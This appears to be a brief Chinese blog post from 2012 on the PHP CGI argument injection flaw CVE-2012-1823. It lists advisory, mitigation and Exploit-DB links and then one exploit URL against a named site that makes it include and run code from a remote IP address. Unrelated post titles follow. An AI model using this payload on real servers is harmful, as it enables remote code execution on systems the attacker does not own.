PHP CGI Argument Injection

2012-05-05 23:50:00

<* 參考

<a href="http://sebug.net/lto?url=http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/">http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/</a> <a href="http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/">http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/</a> <a href="http://sebug.net/lto?url=http://ompldr.org/vZGxxaQ">http://ompldr.org/vZGxxaQ</a> <a href="http://sebug.net/lto?url=http://zone.wooyun.org/content/151">http://zone.wooyun.org/content/151</a> <a href="http://sebug.net/lto?url=http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823.html">http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823.html</a> <a href="http://sebug.net/lto?url=http://www.php-security.net/archives/11-Mitigation-for-CVE-2012-1823-CVE-2012-2311.html">http://www.php-security.net/archives/11-Mitigation-for-CVE-2012-1823-CVE-2012-2311.html</a>

exploit:

<a href="http://www.exploit-db.com/exploits/18836/">http://www.exploit-db.com/exploits/18836/</a>

漏洞利用:

<a href="http://gdfreenet.cn/new.php?-dallow_url_include%3Don+-dauto_prepend_file%3Dhttp://218.56.57.151/testtest.txt">http://gdfreenet.cn/new.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://218.56.57.151/testtest.txt</a>

PHP CGI Argument Injection

繼續閱讀

ecshop屬性排序

C語言：初學者必定看懂的注釋！！！猴子吃桃問題。猴子第一天摘下若幹個桃子，每天都吃了前一天剩下的一半零一個，到第10天早上想再吃的時候，就剩下一個桃子. 求第一天共摘多少個桃子。

Ubuntu16.04安裝Apache+MySQL+PHP1. 安裝Apache2. 安裝MySQL3. 安裝PHP4. 安裝phpMyAdmin

[轉]九大排序算法——C語言實作及詳解

版本号隐藏

while 循環、do- while 循環和 for 循環之間的那點事C語言自學之三種循環比較

Apache配置SSLApache配置SSL

Windows下配置Apache的SSL服務

Apache2.4.x 配置檔案詳解Apache配置需要了解如下：開始講解：

配置apache支援PHP（win7）

結構體：typedef與struct的差別

Cloud Studio初體驗

NOSQL安全攻擊

php 去掉字元串的最後一個字元及截取原字元串1,2,3,4,5,6,

php——水印

hdu7108哈希